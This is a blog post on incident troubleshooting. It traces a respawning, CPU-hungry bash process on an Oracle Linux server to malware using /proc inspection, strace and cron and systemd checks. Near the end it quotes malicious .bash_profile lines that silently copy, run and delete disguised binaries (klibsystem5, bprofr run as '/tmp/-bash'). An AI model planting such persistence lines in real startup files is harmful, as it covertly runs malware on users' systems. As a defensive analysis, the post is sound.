Decoding the High CPU Usage Mystery: A Bash Shell Odyssey
This blog post details the investigation of a high CPU usage issue caused by a rogue bash process on an Oracle Linux server. The systematic investigation traced the CPU usage to malicious scripts. The post also offers insights into troubleshooting bash process issues and highlights the importance of secure system configurations.
Note that this is based on a real story: an issue reported to me through my forum, Erman Arslan's Oracle Forum.
The Case:
The customer encountered a bash process consuming 98% CPU. Killing it brought only temporary relief, as the process restarted automatically.
The Investigation Begins:
I requested more information to understand the process's behavior. The customer provided the top command output, which showed the bash process with high CPU usage.
Digging Deeper:
I suggested using ps with the -elf flag to get detailed process information. This showed that the bash process was in the sleeping state (S). The /proc/8879/cmdline file (8879 being the PID of the process) confirmed it was a bash shell, but the process seemed inactive.
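The same state and command-line details can also be read directly from /proc. The following is a minimal sketch, assuming a Linux /proc filesystem; the function name proc_summary is illustrative and was not part of the original investigation.

```shell
#!/usr/bin/env bash
# Sketch: summarize a process from /proc (assumes Linux).
# proc_summary is a hypothetical helper name, not an existing tool.
proc_summary() {
  local pid="$1"
  if [ ! -r "/proc/$pid/status" ]; then
    echo "no readable /proc entry for PID $pid" >&2
    return 1
  fi
  # Name, state (for example "S (sleeping)") and parent PID
  grep -E '^(Name|State|PPid):' "/proc/$pid/status"
  # cmdline is NUL-separated, so convert NULs to spaces for display
  printf 'Cmdline: %s\n' "$(tr '\0' ' ' < "/proc/$pid/cmdline")"
}

# Example: inspect the current shell; in this case the argument was 8879
proc_summary "$$"
```

Reading /proc directly avoids depending on the exact column layout of ps, which differs between versions.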
Next, I requested the output of w to see logged-in users and their processes. This helped rule out user interaction as the cause.
Process Examination:
I instructed the customer to examine the bash process's working directory (/proc/8879/cwd) and its open file descriptors (cd /proc/8879/fd/; ls -la). This revealed that the process had file descriptors related to appsdev, a development OS user, and seemed to be waiting for an event (eventpoll).
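The working directory and descriptor targets can be listed in one pass by resolving the symlinks under /proc. This is a minimal sketch, assuming Linux; list_fds is a hypothetical helper name, and inspecting another user's process needs root or that user's privileges.

```shell
#!/usr/bin/env bash
# Sketch: show where a process's cwd and file descriptors point (assumes Linux /proc).
# list_fds is a hypothetical helper name.
list_fds() {
  local pid="$1" fd
  [ -d "/proc/$pid/fd" ] || return 1
  echo "cwd -> $(readlink "/proc/$pid/cwd" 2>/dev/null)"
  for fd in /proc/"$pid"/fd/*; do
    # Each entry is a symlink to a file, pipe, socket, or anon_inode
    # such as anon_inode:[eventpoll]
    echo "${fd##*/} -> $(readlink "$fd" 2>/dev/null)"
  done
}

# Example: inspect the current shell; in this case the argument was 8879
list_fds "$$"
```

Entries that resolve to anon_inode:[eventpoll] or anon_inode:[eventfd] are the ones discussed in the background notes.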
Background info:
Unknown process showing up as -bash: This process might be a child process spawned by the bash shell itself, or another system service running in the background.
4 -> anon_inode:[eventpoll]: This indicates the process is using an event poll mechanism to monitor events from various sources.
9 -> anon_inode:[eventfd]: This suggests the process might be using an eventfd for efficient inter-process communication or signaling.
It is probably an OS process. The OS or a daemon probably starts it. It may belong to a monitoring process such as systemd-monitor.
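To check whether the OS or a daemon started the process, its parent chain can be followed upwards. Below is a minimal sketch, assuming Linux; parent_chain is a hypothetical helper name that reads the PPid field from /proc/<pid>/status.

```shell
#!/usr/bin/env bash
# Sketch: walk up the parent chain of a process using /proc (assumes Linux).
# parent_chain is a hypothetical helper name.
parent_chain() {
  local pid="$1" name ppid
  while [ "${pid:-0}" -gt 0 ] && [ -r "/proc/$pid/status" ]; do
    name="$(awk '/^Name:/ {print $2}' "/proc/$pid/status")"
    ppid="$(awk '/^PPid:/ {print $2}' "/proc/$pid/status")"
    echo "$pid $name"
    pid="$ppid"
  done
}

# Example: print the ancestry of the current shell, one "PID name" per line
parent_chain "$$"
```

If the chain ends directly at PID 1, the process was either started by init/systemd or was orphaned and re-parented, which is common for processes that detach themselves.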
* Use ps aux or pstree to get a detailed listing of running processes. Look for processes whose parent process ID (PPID) matches the PID of the bash shell.
Stracing the System Call:
I analyzed the output of strace on the process. This confirmed the bash process was stuck in the epoll_pwait system call, waiting for events from an epoll instance. The repeated calls with timeouts suggested it wasn't receiving the expected events. Here's how to interpret the output and troubleshoot further:
epoll_pwait: This system call waits for events on an epoll instance. It's a mechanism for efficient I/O waiting in applications.
The arguments to epoll_pwait specify the epoll instance, a buffer for the returned events, the maximum number of events to return, a timeout in milliseconds, and a signal mask.
Analysis of strace Output:
The process repeatedly calls epoll_pwait with a timeout (values like 182, 220, etc.).
Between calls, it uses clock_gettime to get the current time. This suggests the process isn't receiving expected events and keeps waiting with timeouts.
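When the trace is long, counting calls per system call makes a pattern like this easier to see. The following is a minimal sketch; summarize_strace is a hypothetical helper, and it assumes the plain log format written by strace -p <pid> -o <file>, without -f or timestamp options.

```shell
#!/usr/bin/env bash
# Sketch: count system calls in a saved strace log.
# summarize_strace is a hypothetical helper; it assumes the plain format
# written by "strace -p <pid> -o <file>" (no -f or timestamp prefixes).
summarize_strace() {
  local log="$1"
  # Keep lines that start with "syscall(", take the name, count occurrences
  grep -E '^[a-z_0-9]+\(' "$log" | cut -d'(' -f1 | sort | uniq -c | sort -rn
}

# Example (needs root or the process owner; stop strace with Ctrl-C):
#   strace -p 8879 -o /tmp/bash-8879.trace
#   summarize_strace /tmp/bash-8879.trace
```

A log dominated by epoll_pwait and clock_gettime would match the waiting-with-timeouts behavior described above. strace -c -p <pid> prints a similar summary directly, at the cost of not keeping the individual calls.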
Suggested Further Investigation:
- Check cron jobs and systemd services for any entries that might be starting the bash process.
- Review system logs (/var/log/messages and dmesg) for any errors related to the process.
- Investigate the script's purpose: if the script is legitimate, find out what it is for and modify it to avoid excessive I/O calls and resource usage.
- Debug Bash Processes (Cautionary Approach): I warned about the risks of enabling debug for all bash processes. This is a complex approach and should only be attempted with a thorough understanding of the potential consequences.
- Suggested commands for gathering context:
- pstree
- cat /proc/<pid>/cmdline
- readlink /proc/<pid>/cwd
- cd /proc/<pid>/fd; ls -al
- ls -l /proc/<pid>/cwd
- strace -p <pid>
- lsof -p <pid>
- crontab -l
- systemctl list-unit-files and systemctl status <service_name> (for systemd services)
- cat .bash_profile (the customer discovered this one with the help of the suggestions)
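The cron and systemd checks from the list above can be gathered in one place. This is a minimal sketch; check_autostart is a hypothetical helper name, the cron directories are the usual defaults and may differ per system, and each step is skipped quietly when the tool or directory is missing.

```shell
#!/usr/bin/env bash
# Sketch: list common places that can start a process automatically.
# check_autostart is a hypothetical helper name; paths are common defaults.
check_autostart() {
  echo "== user crontab =="
  crontab -l 2>/dev/null || echo "(none, or crontab unavailable)"

  echo "== system cron directories =="
  ls -la /etc/cron.d /etc/cron.daily /etc/cron.hourly 2>/dev/null || true

  echo "== enabled systemd services =="
  if command -v systemctl >/dev/null 2>&1; then
    systemctl list-unit-files --type=service --state=enabled --no-pager 2>/dev/null || true
  else
    echo "(systemctl not found)"
  fi
}

check_autostart
```

Running it once as root and once as the affected OS user shows both system-wide and per-user entries, since crontab -l only lists the calling user's jobs.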
The Culprit Revealed:
With the provided guidance, the customer discovered a suspicious entry in his .bash_profile that was designed to automatically copy and execute a script (/tmp/-bash). This script appeared to be scanning for open ports (80, 443, etc.). This explained the eventpoll descriptor and the process waiting for I/O.
--
I can see there is an entry that was added to .bash_profile automatically. Please see below:
cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null
--
* The system was affected by klibsystem5 and bprofr. Both were malware.
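Entries like these can be searched for across shell startup files. Below is a minimal sketch; scan_startup_files and its pattern (paths under /tmp, /var/tmp, and /dev/shm) are illustrative assumptions, and a match is only a hint for manual review, not proof of compromise.

```shell
#!/usr/bin/env bash
# Sketch: flag startup-file lines that reference world-writable locations.
# scan_startup_files and the pattern are illustrative assumptions; a match is
# only a hint for manual review, not proof of compromise.
scan_startup_files() {
  local pattern='/tmp/|/var/tmp/|/dev/shm/'
  local f
  for f in "$@"; do
    if [ -r "$f" ]; then
      # -H prints the file name, -n the line number of each match
      grep -HnE "$pattern" "$f" || true
    fi
  done
}

# Example: check the usual bash startup files of the current user
scan_startup_files "$HOME/.bash_profile" "$HOME/.bashrc" "$HOME/.profile"
```

The pattern would catch the /tmp/.pwn/bprofr line shown above but not the /bin/klibsystem5 line, so it complements reading the files by hand rather than replacing it.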
Suggestions for the fix:
- Manual removal of the malware (klibsystem5 and bprofr): locate their source files and the affected system files, then delete the malware files and clean the affected system files one by one.
- Migrating the affected applications and databases to a new server. This might be the better option if we can't be sure that all of the malware has been removed. However, migration carries the risk of bringing the malware along, so it requires careful and delicate work.